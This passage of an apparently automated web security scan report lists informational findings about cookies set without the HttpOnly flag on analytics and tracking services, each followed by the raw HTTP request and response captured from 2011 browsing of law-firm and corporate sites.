Set-Cookie: OAID=364dcf6e49dae059d4ab5b792b30c31c; expires=Fri, 11-May-2012 18:35:40 GMT; path=/
Vary: Accept-Encoding
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.58. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941?AQB=1&ndh=1&t=12%2F4%2F2011%2011%3A8%3A58%204%20300&ce=UTF-8&ns=findlaw&pageName=www.powelltrachtman.com%3Ahome%20page&g=http%3A%2F%2Fwww.powelltrachtman.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPowell%2BTrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.powelltrachtman.com&server=Firmsite&events=event41%3A1305216538594-15367%2Cevent1%2Cevent27&c1=www.powelltrachtman.com&v1=D%3Dc1&h1=www.powelltrachtman.com&c2=www.powelltrachtman.com&v2=D%3Dc2&c3=www.powelltrachtman.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.powelltrachtman.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Epowell%2Btrachtman&c11=n%2Fa%20%7C%20www.powelltrachtman.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20powell%2Btrachtman%20%7C%20www.powelltrachtman.com%3Ahome%20page&v12=D%3Dc12&c18=15367&v18=15367&c19=15367-2011m5&v19=D%3Dc19&c20=1066035&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dpowell%2Btrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=powell%2Btrachtman&c50=findlaw-12282&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: attorney.findlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:09:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E6031A851D18C3-40000135A009D2C8[CE]; Expires=Tue, 10 May 2016 16:09:25 GMT; Domain=.findlaw.com; Path=/
Location: http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941?AQB=1&pccr=true&vidn=26E6031A851D18C3-40000135A009D2C8&&ndh=1&t=12%2F4%2F2011%2011%3A8%3A58%204%20300&ce=UTF-8&ns=findlaw&pageName=www.powelltrachtman.com%3Ahome%20page&g=http%3A%2F%2Fwww.powelltrachtman.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPowell%2BTrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.powelltrachtman.com&server=Firmsite&events=event41%3A1305216538594-15367%2Cevent1%2Cevent27&c1=www.powelltrachtman.com&v1=D%3Dc1&h1=www.powelltrachtman.com&c2=www.powelltrachtman.com&v2=D%3Dc2&c3=www.powelltrachtman.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.powelltrachtman.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Epowell%2Btrachtman&c11=n%2Fa%20%7C%20www.powelltrachtman.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20powell%2Btrachtman%20%7C%20www.powelltrachtman.com%3Ahome%20page&v12=D%3Dc12&c18=15367&v18=15367&c19=15367-2011m5&v19=D%3Dc19&c20=1066035&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dpowell%2Btrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=powell%2Btrachtman&c50=findlaw-12282&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 16:09:25 GMT
Last-Modified: Fri, 13 May 2011 16:09:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www373
Content-Length: 0
Content-Type: text/plain

18.59. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657?AQB=1&ndh=1&t=12%2F4%2F2011%2011%3A9%3A26%204%20300&ce=UTF-8&ns=findlaw&pageName=www.jdtplaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.jdtplaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DJackson%2BDeMarco%2BTidus%2BPeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.jdtplaw.com&server=Firmsite&events=event41%3A1305216566069-15818%2Cevent1%2Cevent27&c1=www.jdtplaw.com&v1=D%3Dc1&h1=www.jdtplaw.com&c2=www.jdtplaw.com&v2=D%3Dc2&c3=www.jdtplaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.jdtplaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Ejackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c11=n%2Fa%20%7C%20www.jdtplaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20jackson%2Bdemarco%2Btidus%2Bpeckenpaugh%20%7C%20www.jdtplaw.com%3Ahome%20page&v12=D%3Dc12&c18=15818&v18=15818&c19=15818-2011m5&v19=D%3Dc19&c20=1086740&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Djackson%2Bdemarco%2Btidus%2Bpeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=jackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c50=findlaw-12513&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: attorney.findlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:10:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E6033D051D0A24-40000105800472A2[CE]; Expires=Tue, 10 May 2016 16:10:34 GMT; Domain=.findlaw.com; Path=/
Location: http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657?AQB=1&pccr=true&vidn=26E6033D051D0A24-40000105800472A2&&ndh=1&t=12%2F4%2F2011%2011%3A9%3A26%204%20300&ce=UTF-8&ns=findlaw&pageName=www.jdtplaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.jdtplaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DJackson%2BDeMarco%2BTidus%2BPeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.jdtplaw.com&server=Firmsite&events=event41%3A1305216566069-15818%2Cevent1%2Cevent27&c1=www.jdtplaw.com&v1=D%3Dc1&h1=www.jdtplaw.com&c2=www.jdtplaw.com&v2=D%3Dc2&c3=www.jdtplaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.jdtplaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Ejackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c11=n%2Fa%20%7C%20www.jdtplaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20jackson%2Bdemarco%2Btidus%2Bpeckenpaugh%20%7C%20www.jdtplaw.com%3Ahome%20page&v12=D%3Dc12&c18=15818&v18=15818&c19=15818-2011m5&v19=D%3Dc19&c20=1086740&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Djackson%2Bdemarco%2Btidus%2Bpeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=jackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c50=findlaw-12513&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 16:10:34 GMT
Last-Modified: Fri, 13 May 2011 16:10:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www44
Content-Length: 0
Content-Type: text/plain

18.60. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943?AQB=1&ndh=1&t=12%2F4%2F2011%2011%3A9%3A13%204%20300&ce=UTF-8&ns=findlaw&pageName=www.nldhlaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.nldhlaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DNelson%2BLevine%2BdeLuca%2B%2526%2BHorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.nldhlaw.com&server=Firmsite&events=event41%3A1305216553783-24404%2Cevent1%2Cevent27&c1=www.nldhlaw.com&v1=D%3Dc1&h1=www.nldhlaw.com&c2=www.nldhlaw.com&v2=D%3Dc2&c3=www.nldhlaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.nldhlaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Enelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c11=n%2Fa%20%7C%20www.nldhlaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20nelson%2Blevine%2Bdeluca%2B%26%2Bhorst%20%7C%20www.nldhlaw.com%3Ahome%20page&v12=D%3Dc12&c18=24404&v18=24404&c19=24404-2011m5&v19=D%3Dc19&c20=1272517&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dnelson%2Blevine%2Bdeluca%2B%2526%2Bhorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=nelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c50=findlaw-16733&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: attorney.findlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:10:17 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E60334051D33E5-6000012A40014AB2[CE]; Expires=Tue, 10 May 2016 16:10:16 GMT; Domain=.findlaw.com; Path=/
Location: http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943?AQB=1&pccr=true&vidn=26E60334051D33E5-6000012A40014AB2&&ndh=1&t=12%2F4%2F2011%2011%3A9%3A13%204%20300&ce=UTF-8&ns=findlaw&pageName=www.nldhlaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.nldhlaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DNelson%2BLevine%2BdeLuca%2B%2526%2BHorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.nldhlaw.com&server=Firmsite&events=event41%3A1305216553783-24404%2Cevent1%2Cevent27&c1=www.nldhlaw.com&v1=D%3Dc1&h1=www.nldhlaw.com&c2=www.nldhlaw.com&v2=D%3Dc2&c3=www.nldhlaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.nldhlaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Enelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c11=n%2Fa%20%7C%20www.nldhlaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20nelson%2Blevine%2Bdeluca%2B%26%2Bhorst%20%7C%20www.nldhlaw.com%3Ahome%20page&v12=D%3Dc12&c18=24404&v18=24404&c19=24404-2011m5&v19=D%3Dc19&c20=1272517&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dnelson%2Blevine%2Bdeluca%2B%2526%2Bhorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=nelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c50=findlaw-16733&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 16:10:16 GMT
Last-Modified: Fri, 13 May 2011 16:10:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 0
Content-Type: text/plain

18.61. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1956180586&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.superlawyers.com%252Fpennsylvania%252Flawyer%252FGlenn-A-Ellis%252F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html%26jsref%3Dhttp%253A%252F%252Flayserfreiwald.com%252Fattorneys.html%253Fmode%253Dview%2526AID%253D8%26rnd%3D1305225348465&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&jsref=http%3A%2F%2Flayserfreiwald.com%2Fattorneys.html%3Fmode%3Dview%26AID%3D8&rnd=1305225348465
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 18:35:49 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 18:35:49 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

18.62. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=4003536&resolution=1920&h=1200&camefrom=http%3A//www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators&u=http%3A//www.glaala.org/clubportal/glaala/index.cfm&t=legal%20administrator%2C%20ala%2C%20GLA%2C%20los%20angeles%20-&java=1&security=24b78521&sc_random=0.6984565668166883&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.glaala.org/clubportal/glaala/index.cfm
Cookie: is_unique=sc4658975.1305126718.0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:09:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc4658975.1305126718.0-4003536.1305223761.0; expires=Tue, 10-May-2016 18:09:21 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
18.63. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgroup.112.2o7.net
Path:   /b/ss/capgroupprod/1/H.15.1/s41646418426182

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/capgroupprod/1/H.15.1/s41646418426182?[AQB]&ndh=1&t=12/4/2011%2014%3A44%3A37%204%20300&ns=capgroup&pageName=cg%3Ahome%3Ahome%20page&g=http%3A//www.capgroup.com/&r=http%3A//www.google.com/search%3Fq%3Dwww.capgroup.com%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=home&c1=cg&v1=cg&c11=Data%20Not%20Available&c12=Data%20Not%20Available&v20=Data%20Not%20Available&v21=Data%20Not%20Available&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1169&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&[AQE] HTTP/1.1
Host: capgroup.112.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capgroup.com/
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DCBEC0F[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 19:44:39 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E61C53851583C5-6000017020098095[CE]; Expires=Tue, 10 May 2016 19:44:39 GMT; Domain=capgroup.112.2o7.net; Path=/
Location: http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182?AQB=1&pccr=true&vidn=26E61C53851583C5-6000017020098095&&ndh=1&t=12/4/2011%2014%3A44%3A37%204%20300&ns=capgroup&pageName=cg%3Ahome%3Ahome%20page&g=http%3A//www.capgroup.com/&r=http%3A//www.google.com/search%3Fq%3Dwww.capgroup.com%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=home&c1=cg&v1=cg&c11=Data%20Not%20Available&c12=Data%20Not%20Available&v20=Data%20Not%20Available&v21=Data%20Not%20Available&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1169&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 19:44:39 GMT
Last-Modified: Fri, 13 May 2011 19:44:39 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www329
Content-Length: 0
Content-Type: text/plain

18.64. http://centrifugesystems.app101.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://centrifugesystems.app101.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: centrifugesystems.app101.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 19:27:56 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=ak3aKqwvzQEkAAAAMTRmYzcwNTctMjkxNy00NTIyLWI3MjYtZjUyY2NjM2E1NGZj0; expires=Fri, 11-May-2012 19:27:56 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=e508d7f7-4d7c-4017-9137-bc530b45f2fc; domain=centrifugesystems.app101.hubspot.com; expires=Wed, 12-May-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT140=2064716972.0.0000; path=/
Content-Length: 498


var hsUse20Servers = true;
var hsDayEndsIn = 30723;
var hsWeekEndsIn = 289923;
var hsMonthEndsIn = 1672323;
